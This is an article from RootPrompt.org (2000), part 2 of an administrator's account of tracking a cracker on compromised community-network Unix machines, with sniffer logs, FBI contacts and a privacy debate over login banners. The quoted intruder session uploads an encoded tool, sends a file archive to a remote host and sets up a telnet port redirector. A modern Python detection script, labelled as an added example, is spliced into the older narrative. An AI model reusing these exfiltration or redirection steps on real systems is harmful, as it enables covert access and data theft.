# RootPrompt.org: Nothing but Unix.

 Feature: Cracked! Part 2: Watching and Waiting

In this second article Noel continues the story of how some Unix boxes that he helped admin were cracked. This article talks about watching the cracker with a sniffer and talking to the FBI's Computer Crimes Squad.


(Submitted by Noel, Wed May 10, 2000)



Part 2

Watching and Waiting

This is the second part of the story of a community network that was cracked and what was done to recover from it. The first part Cracked! Part1: Denial and truth details the report that leads to the discovery that the community network was indeed cracked and some of the initial reactions. This article talks about how they learned more about the cracker and what they did next.

We were still very concerned that if the cracker realized that we were on to him he would just trash the system to cover up his tracks. We did not feel that we had any way to be sure that we could get all of the backdoors that he could have installed, given the length of time that he had been on the system. But at the same time we needed to learn more about what he was doing and where he was coming from. We also hoped that we could gather clues about how he had gotten in. So we decided to run a sniffer to watch what he was doing.

I had a Linux box that was on the same network as the community network machines but was not part of the community network. It had not been up for very long, had most of its services turned off and had never had more than myself and a few friends log into it. From this I gambled that it probably had not been cracked.

On this Linux box I set up a sniffer to watch for traffic going to the ISP and some of the sites we had suspected he was coming from. We thought that by watching him, to see where he was coming from and what he was doing, we could get some idea of who he was, what his motivations were and, most important, what he was doing. We also thought that we could use this to find out what kind of skills he had. Was he a script kiddie, or a super cracker like it was claimed?

For the sniffer I used sniffit, as that was the sniffer I was most familiar with. I configured it to capture only packets going to and from the ISP and the sites that we suspected him of coming from. I could not just turn on a sniffer and let it record all of the packets coming across the wire, as there would have been so much traffic recorded that it would not have helped me figure out what the cracker was doing. He would have been hidden in the noise and it would have been very difficult, if not impossible, to see what traffic was his.

I started learning some things about him right from the start.

The first night the sniffer recorded this exchange between the cracker and someone at the ISP:

*hi, there.
*i wonder if bob told you something i've asked him  about
*well that was a while back (last week, and i've talked to 
him  about this 
a few weeks ago for the first time)
*i dunno he said you might do that but you needed 
to think about it or
*well no i'm on someone elses  account now... borrowed if you can put
it that way 
*and i tried to page bob but he's not answering so i thought i'd page
 you and find out whats going on. it's been a while since i asked i
 think i should have an  answer some time soon well, he seems to me
 logged on and not idle at his computer so i  thought i'd try  to page
*yeah i guess i do
*just a normal user account i guess. maybe also a
 static ip address but that's not very important 
*i thought we discussed all that with him when we talked, adn he
should have told you
*guess you dont think thats too important
oh, whatever i want to use it for. email, or ftp, or irc, or whatever
else you have here.
*yes i want a dialup as well as a shell (but chances are i wont use
the dialup much if at all).
*yes, thats where i live.
*i can't find a regular job to do any of those things i like to do
with computers, so currently i'm mostly not working :-( that would be
one way to use it, but i'm not much into that. don't even know what is
satellite codes. that's why i said probably i won't use the dialup
much. i just want to have the option to use it if ever i need
to. well, i'm a programmer, i can program pretty much anything
(although i prefer to  code things that dont require a user interface,
such as device  drivers, etc). 
*also i could of course administrate unix systems if that counts as
work :-)
*yes, i've done that once
*i'm supposed to know a lot about unix secureity anyway

The ISP owner had told me that the cracker claimed to be from a third world country and wanted a legitimate account on their system. He had also hinted that he might want a job in the US. So this conversation seemed to back that up.

Not that this proved he was from a third world country or anything like that, it is as easy to say you are from one place as another. I even thought that he was more likely to be from some other place than the one he claimed.

Once he was finished with this conversation he uploaded some sort of file transfer program through his telnet connection. (I have replaced the hostname to protect the innocent)

$ cat >f
begin 750 f.gz*M'XL("C;P"56'UL4]<5O[9?@@L!'`
$ uudecode f
$ gzip -df f.gz
$ f include.tgz hostname
$ rm f include.tgz

Examining this program later I found that it used UDP to connect to a server daemon to transfer the files to a remote host. It was used in a manner similar to how rcp or scp would work, but seemed to be a custom program. This still did not convince us that he was more than a script kiddie. He could have gotten the code from someone and just be using it.

Later that evening he connects to the ISP and starts talking to what looks like one of the system admins from the ISP about his Linux Kernel module that hides files and directories:

*which things were you impressed with
*hehe.... not if i can help it...
*but some things like that were recently published in the phrack
*of course that stuff isn't as good as mine :-)
*not really, its just that i don't have a particular reason to make
them freely available... i don't see how that would do me any good,
but i can see rather the  opposite
*as to why i code, well, it's not as much fun as it used  to... i've
been doing that for a very long time well, concerning this particular
tool with the hidden directories, it's far from  being entirely
invisible. so if everyone knew how it worked people  could find i
.. and i'd rather them not to , since i'm still using it yep
*but if its loaded through /etc/init it's not that difficult to find it

A few months before this Bugtraq and Phrack had released code for a Linux Kernel module that did about the same things that he said his did. So again I was pretty skeptical about these claims. It is easy to say that you are an elite cracker and much harder to be one. As we learned it can also be hard to spot one.

As I read the sniffer logs I tried to connect them to logins on the community network machines. To my surprise I found that even though the sniffer was recording connections from our machines, there were no corresponding logins recorded in the logs. My first thought was that he was "cleaning" the login logs on our machines. But on closer examination the sniffer logs recorded something interesting on a strange port.

set 2323 23 hostname

He was running a process on our boxes that redirected his connections without requiring him to log in at all. This software listened on a high port and allowed him to set the port to be redirected dynamically. The above example configured his software to redirect any connection to port 2323 on our machine to port 23 (the telnet port) on the ISP's machine.

By using the port redirector he would show up as coming from our system while still not showing anything in our logs.
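As an added example (not Noel's code or logs), here is how the two observations above can be turned into a check: first restrict the sniffer's sessions to the suspected hosts, as the sniffit configuration did, then flag outbound sessions from a community machine during which the login records show nobody logged in, and inbound sessions on a port nothing on that machine should be serving. All addresses, users, ports and times are constructed; the `Session` and `Login` records stand in for whatever the sniffer and `last`/wtmp actually produce.

```python
# Added example, not code from the article: correlate sniffer-observed
# sessions with login records. Every host, user, port and timestamp here
# is constructed sample data.
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set

# Constructed stand-ins: the ISP plus one suspected origin host, and two
# community-network machines.
SUSPECT_HOSTS: Set[str] = {"198.51.100.7", "203.0.113.9"}
COMMUNITY_HOSTS: Set[str] = {"192.0.2.10", "192.0.2.11"}
# Ports the community machines are expected to serve (constructed list).
EXPECTED_INBOUND_PORTS: Set[int] = {22, 23, 25, 80, 110}


@dataclass(frozen=True)
class Session:
    """One TCP session as a sniffer would summarise it."""
    start: datetime
    src: str
    dst: str
    dport: int


@dataclass(frozen=True)
class Login:
    """One wtmp-style record: `user` logged in on `server` from `remote`."""
    user: str
    server: str
    remote: str
    login: datetime
    logout: Optional[datetime]  # None means the session was still open


def filter_sessions(sessions: List[Session], suspects: Set[str] = SUSPECT_HOSTS) -> List[Session]:
    """Keep only sessions that touch a suspected host, the way the sniffit
    configuration limited capture to the ISP and suspected origins instead
    of recording everything on the wire."""
    return [s for s in sessions if s.src in suspects or s.dst in suspects]


def unexplained_outbound(sessions: List[Session], logins: List[Login],
                         community: Set[str] = COMMUNITY_HOSTS) -> List[Session]:
    """Outbound sessions from a community machine while the login records
    show nobody logged in on it. A port redirector running as a daemon
    produces exactly this: traffic leaves the box, the login logs stay empty."""
    flagged = []
    for s in sessions:
        if s.src not in community:
            continue
        covered = any(
            rec.server == s.src
            and rec.login <= s.start
            and (rec.logout is None or s.start <= rec.logout)
            for rec in logins
        )
        if not covered:
            flagged.append(s)
    return flagged


def odd_inbound_ports(sessions: List[Session], community: Set[str] = COMMUNITY_HOSTS,
                      expected: Set[int] = EXPECTED_INBOUND_PORTS) -> List[Session]:
    """Inbound sessions to a community machine on a port it is not expected
    to serve; a redirector listening on a high port such as 2323 lands here."""
    return [s for s in sessions if s.dst in community and s.dport not in expected]


def demo() -> Dict[str, List[Session]]:
    """Run the checks over constructed sample data and return the results."""
    t = datetime(2000, 5, 1, 22, 0)  # constructed reference time
    sessions = [
        # unrelated web hit from a host nobody suspects; the filter drops it
        Session(t - timedelta(hours=2), "203.0.113.77", "192.0.2.10", 80),
        # a real user's telnet to the ISP; the login records explain it
        Session(t - timedelta(minutes=30), "192.0.2.11", "198.51.100.7", 23),
        # the ISP host connects to the redirector's high port
        Session(t + timedelta(minutes=1), "198.51.100.7", "192.0.2.10", 2323),
        # the redirected connection leaves the box with nobody logged in
        Session(t + timedelta(minutes=2), "192.0.2.10", "198.51.100.7", 23),
    ]
    logins = [
        Login("alice", "192.0.2.11", "203.0.113.20", t - timedelta(hours=1), t + timedelta(minutes=30)),
        Login("bob", "192.0.2.10", "203.0.113.21", t - timedelta(hours=3), t - timedelta(hours=2, minutes=15)),
    ]
    kept = filter_sessions(sessions)
    return {
        "filtered": kept,
        "unexplained": unexplained_outbound(kept, logins),
        "odd_ports": odd_inbound_ports(kept),
    }


if __name__ == "__main__":
    results = demo()
    for label in ("unexplained", "odd_ports"):
        for s in results[label]:
            print(f"{label}: {s.start:%H:%M} {s.src} -> {s.dst}:{s.dport}")
```

Run directly, it prints the one outbound telnet session with no login behind it and the one inbound hit on port 2323. The check is only as trustworthy as the login records it reads, which is exactly why the first suspicion in the text was that the login logs were being cleaned; the sniffer on a separate, uncompromised box is what made the comparison meaningful.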

None of this proved that the cracker was more than a script kiddie, but I was starting to get a little nagging doubt that he might be more than we were giving him credit for. That he might be the highly skilled cracker and programmer that we would later learn that he was.

About this time I got the return phone call from the FBI Computer Crime Squad agent that was working on the ISP's case. He asked me some general questions about our situation. What machines had been cracked, where we saw the connections coming from etc.

Talking to him I felt better because he actually seemed to know something about computers, the Internet and, to some extent, Unix. We had some past dealings with the local FBI office investigating a child pornography case and they had not known anything about computers or the Internet at all. When the local agent talked to us about being online, he was talking about BBS systems.

The FBI Computer Crime Squad agent was very interested in what we said in our login banner or message of the day. He wanted to know what kind of notice we gave about use of our system. He informed me that as the operators of the system we had the legal right to watch the system and sniff the network but that it was not admissible into court once we reported the crime. He sent me via my work email account a selection of possible warning banners that we could show people when they logged into our machines.

I forwarded the request from the FBI and the example banners to our executive director and he in turn talked to our Board of Directors. They had a cow. A big fat cow. We had always tried to protect our users' privacy and this seemed to them to be the complete opposite of that. They came up with a very watered down statement that still could not get complete agreement from all the board members.

Later, after the system had been trashed by the cracker and we were all working to recover what we could, we put up the following, word for word from the example the FBI sent us:

This computer system is for authorized users only. Individuals using this system without authority or in excess of their authority are subject to having all their activities on this system monitored and recorded or examined by any authorized person, including law enforcement, as system personnel deem appropriate. In the course of monitoring individuals improperly using the system or in the course of system maintenance, the activities of authorized users may also be monitored and recorded. Any material so recorded may be disclosed as appropriate. Anyone using this system consents to these terms.

This time there was a unanimous decision by the board to put it up even though it trampled to death the right to privacy that they had held so dear just a few weeks earlier.

Interesting how reality can overwhelm conviction. I still have mixed emotions about this sort of thing. I believe in the right to privacy, and yet I was willing to sniff the network. It is a difficult subject to decide upon. It does not always have a clear cut right and wrong. I am sure that there is a point that you should not go beyond and yet there are some bad bad people out there that will tear down what you have worked to build. I think you must balance your requirements to protect your system with the privacy that your users should have. There are no easy answers to this problem.

So I watched and waited for the cracker to show his hand, to use back doors, to connect to more machines. I waited for the FBI Computer Crime Squad to call and tell me that they had arrested the cracker. I watched for more information that would allow me to plan a way out of the mess we had found ourselves in.

Here is the question that continues to make me wonder: when I was watching the cracker, was someone watching me?


Copyright 1999-2005 Noel Davis. Noel also runs web sites about sailing and kayaking.
All trademarks are the property of their owners.
All articles are owned by their author